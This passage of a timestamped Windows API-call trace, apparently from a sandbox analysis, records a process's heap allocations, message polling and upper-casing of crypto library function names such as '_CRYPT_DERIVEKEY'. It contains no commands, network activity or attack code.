Flags=0x0, Size=0x30) returned 0x2e801e8 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0186.552] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0186.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0186.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0186.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.553] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.553] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0186.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0186.553] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0186.554] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0186.554] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.554] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.554] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0186.554] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0186.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0186.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0186.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0186.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0186.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0186.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0186.557] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0186.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0186.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0186.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0186.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0186.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0186.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0186.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0186.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0186.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0186.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0186.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0186.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0186.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0186.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0186.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0186.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0186.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.619] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0186.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0186.620] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.620] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.620] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.621] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.621] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.621] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0186.621] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.621] RtlAllocateHeap 